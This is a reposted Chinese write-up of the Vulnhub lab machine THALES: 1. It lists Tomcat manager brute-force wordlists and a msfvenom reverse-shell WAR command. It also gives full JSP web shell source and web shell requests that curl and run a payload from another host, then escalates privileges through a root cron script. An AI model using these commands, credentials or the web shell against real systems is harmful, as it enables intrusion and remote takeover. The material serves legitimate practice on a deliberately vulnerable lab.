vulnhub靶机-THALES: 1
2022/3/19 6:31:42
本文主要是介绍vulnhub靶机-THALES: 1,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
1、找到靶机ip:192.168.1.106
nmap -sn 192.168.1.0/24
2、扫描靶机端口,开放22和8080端口
3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录
可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要用户名和密码登录,可以使用msf进行爆破,具体模块是
auxiliary/scanner/http/tomcat_mgr_login
爆破工具个人认为不是很重要,bp也可以,重要的是字典,上述模块所用到的字典文件内容如下
user.txt admin manager role1 root tomcat both pass.txt admin manager role1 root tomcat s3cret vagrant user_pass.txt j2deployer j2deployer ovwebusr OvW*busr1 cxsdk kdsxc root owaspbwa ADMIN ADMIN xampp xampp tomcat s3cret QCC QLogic66 admin vagrant
爆破得到管理后台用户名和密码 tomcat:role1
4、生成war包的方式有多种,可以直接使用msfvenom生成,访问能直接反弹shell,命令如下
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=1234 -f war -o revshell.war
也可以自己手动生成war包,先找到一个jsp木马文件,能回显执行命令
//示例 //index.jsp //来源:https://xz.aliyun.com/t/5326 <%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %> <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=big5"> </head> <body> <% Runtime runtime = Runtime.getRuntime(); Process process =null; String line=null; InputStream is =null; InputStreamReader isr=null; BufferedReader br =null; String ip=request.getParameter("cmd"); try { process =runtime.exec(ip); is = process.getInputStream(); isr=new InputStreamReader(is); br =new BufferedReader(isr); out.println("<pre>"); while( (line = br.readLine()) != null ) { out.println(line); out.flush(); } out.println("</pre>"); is.close(); isr.close(); br.close(); } catch(IOException e ) { out.println(e); runtime.exit(1); } %> </body> </html>
将该文件压缩成zip包,然后将zip后缀改成war就制作完成了
5、部署war包
6、反弹shell,使用msfvenom生成elf文件,然后下载到靶机运行
http://192.168.1.106:8080/cr4ke3/?cmd=curl%20-o%20/tmp/shell%20http://192.168.1.105:8088/shell.elf http://192.168.1.106:8080/cr4ke3/?cmd=chmod%20777%20/tmp/shell
http://192.168.1.106:8080/cr4ke3/?cmd=/tmp/shell
打开msf监听端口
msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set lhost 192.168.1.105 set lport 4444 run
成功反弹shell
7、在/home/thales目录下发现notes.txt和user.txt文件
notes.txt内容 I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck. user.txt没有权限
按常理说应该是要先提权到thales用户再提权到root,根据notes.txt文件提示有一个备份文件backup.sh,查看文件权限,发现所有者和组都是root,所以应该是以root的身份在后台运行,可以使用pspy64脚本查看一下,我这里就直接验证猜想
反弹shell两种办法,直接写一句话反弹shell在脚本里,或者在脚本里运行msfvenom生成的木马
就用第二种吧,同样的步骤,拿到user.txt和root.txt
8、补充
(1)步骤4-6只需要msf一个模块即可反弹shell
exploit/multi/http/tomcat_mgr_upload
(2)在tomcat用户下获得thales的密码,可以在/home/thales/.ssh在下载id_rsa文件到本地进行爆破密码
(3)root用户下查看定时任务
这篇关于vulnhub靶机-THALES: 1的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-27消息中间件底层原理资料详解
- 2024-11-27RocketMQ底层原理资料详解:新手入门教程
- 2024-11-27MQ底层原理资料详解:新手入门教程
- 2024-11-27MQ项目开发资料入门教程
- 2024-11-27RocketMQ源码资料详解:新手入门教程
- 2024-11-27本地多文件上传简易教程
- 2024-11-26消息中间件源码剖析教程
- 2024-11-26JAVA语音识别项目资料的收集与应用
- 2024-11-26Java语音识别项目资料:入门级教程与实战指南
- 2024-11-26SpringAI:Java 开发的智能新利器